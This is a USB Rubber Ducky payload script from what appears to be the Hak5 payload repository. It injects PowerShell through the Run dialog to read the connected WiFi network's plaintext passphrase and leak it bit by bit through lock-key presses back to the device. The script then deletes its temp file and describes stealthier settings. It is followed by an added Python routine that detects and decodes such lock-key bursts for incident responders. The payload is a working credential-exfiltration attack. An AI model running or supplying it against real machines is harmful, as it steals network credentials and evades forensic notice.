GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/examples/Exfiltration/Exfiltration-example3.txt
REM Example Simple Keystroke Reflection Attack for Windows
REM Saves currently connected wireless LAN profile to DUCKY
ATTACKMODE HID
LED_OFF
DELAY 2000
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE

REM Store the currently connected WiFi SSID & Key to %tmp%\z
GUI r
DELAY 100
STRINGLN powershell "netsh wlan show profile name=(Get-NetConnectionProfile).Name key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\z"
DELAY 100

REM Convert the stored creds into CAPSLOCK and NUMLOCK values.
GUI r
DELAY 100
STRINGLN powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else{$o+='%{CAPSLOCK}'}}}; $o+='%{SCROLLLOCK}';echo $o >$env:tmp\z"
DELAY 100

REM Reflect the CAPSLOCK and NUMLOCK Keystrokes back to the Ducky.
GUI r
DELAY 100
STRINGLN powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z"
DELAY 100

REM The final SCROLLLOCK keystroke indicates EXFIL is complete.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE



REM Per the initial ATTACKMODE command, the USB Rubber Ducky will act as a HID keyboard.

REM SAVE_HOST_KEYBOARD_LOCK_STATE will save the state of the lock key LEDs, as reported by the target, so that they may be restored to their original configuration after the Keystroke Reflection attack is performed.

REM $_EXFIL_MODE_ENABLED = TRUE will instruct the USB Rubber Ducky to listen for control codes on the USB HID OUT endpoint, saving each change as a bit within loot.bin.

REM $_EXFIL_LEDS_ENABLED = TRUE will flash the USB Rubber Ducky LED as loot is saved, which is useful when debugging. Set it to FALSE for a more stealthy operation; however, the flash drive case should sufficiently conceal the LED.

REM The first powershell one-liner, injected into the run dialog, will save the currently connected WiFi network name (SSID) and plaintext passphrase to a temporary file. The file, known as the "loot", is saved as "z" within the %TEMP% directory ($env:tmp\z), encoded in standard ASCII.

REM The second powershell one-liner will convert the temporary ASCII loot file, bit by bit, into a set of caps lock and num lock key values. It will conclude this file with a final scroll lock value.

REM The third and final powershell one-liner will "press" the lock keys indicated by the temporary file in software, via the SendKeys .NET class. The effect is that the binary values of the converted loot are sent to the USB Rubber Ducky, one bit at a time, via the USB HID OUT endpoint.

REM Additionally, the temporary file will then be removed. The pentester may consider including additional techniques for obfuscation, optimization and reducing the forensic footprint.

REM WAIT_FOR_SCROLL_CHANGE will get triggered when the final key "press" from the SendKeys class is executed, thereby continuing the payload.

REM Finally, $_EXFIL_MODE_ENABLED = FALSE will instruct the USB Rubber Ducky to conclude saving the received control codes in loot.bin, and RESTORE_HOST_KEYBOARD_LOCK_STATE will restore the lock key LEDs to their original state before the exfiltration began.
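As an added defender-side example (not part of the Hak5 payload above), the following Python routine detects the lock-key encoding this payload relies on and reconstructs what was leaked, which is what an incident responder needs from a host-side keystroke log: a long run of CAPSLOCK/NUMLOCK presses at machine speed, with no other key in between, terminated by SCROLLLOCK, decoded as NUMLOCK = 1 and CAPSLOCK = 0, most significant bit first. It assumes a keyboard hook or endpoint agent has produced a list of (timestamp_ms, key) events; the event stream, the 50 ms gap threshold and the sample loot bytes are constructed here.

```python
from typing import List, Tuple

LOCK_KEYS = {"CAPSLOCK", "NUMLOCK", "SCROLLLOCK"}
Event = Tuple[int, str]  # (timestamp in ms, key name) as a keyboard hook might log it


def find_reflection_bursts(events: List[Event], max_gap_ms: int = 50,
                           min_bits: int = 16) -> List[List[str]]:
    """Return runs of CAPSLOCK/NUMLOCK presses that arrive at machine speed
    (no gap above max_gap_ms), contain no other key, and end with SCROLLLOCK.
    A human toggling caps lock never produces a long, evenly paced run."""
    bursts, run, last_t = [], [], None
    for t, key in events:
        if key not in LOCK_KEYS:
            run, last_t = [], None      # an ordinary keystroke breaks the run
            continue
        if last_t is not None and t - last_t > max_gap_ms:
            run = []                    # human-speed gap: start over
        if key == "SCROLLLOCK":
            if len(run) >= min_bits:
                bursts.append(run)      # terminator after a long burst: flag it
            run, last_t = [], None
            continue
        run.append(key)
        last_t = t
    return bursts


def decode_burst(run: List[str]) -> bytes:
    """Rebuild the leaked bytes: NUMLOCK is a 1 bit, CAPSLOCK a 0 bit, MSB first."""
    bits = "".join("1" if k == "NUMLOCK" else "0" for k in run)
    bits = bits[: len(bits) - len(bits) % 8]   # drop a trailing partial byte
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def recovered_loot(events: List[Event]) -> List[bytes]:
    """What an analyst wants from the log: every flagged burst, decoded."""
    return [decode_burst(r) for r in find_reflection_bursts(events)]


def constructed_events() -> List[Event]:
    """Constructed sample log: a user typing, one human CAPSLOCK press, then a
    SendKeys-style burst at 5 ms spacing that encodes the bytes b'Wifi\\n'."""
    events: List[Event] = [(0, "w"), (180, "o"), (400, "CAPSLOCK"), (900, "r")]
    t = 5000
    for b in b"Wifi\n":
        for shift in range(7, -1, -1):          # same 0x80..0x01 order as the payload
            events.append((t, "NUMLOCK" if (b >> shift) & 1 else "CAPSLOCK"))
            t += 5
    events.append((t, "SCROLLLOCK"))
    return events
```

The lone human CAPSLOCK press in the sample is ignored because it is followed by an ordinary keystroke and never reaches the minimum burst length, while the 40-bit burst is flagged and decodes back to the constructed loot.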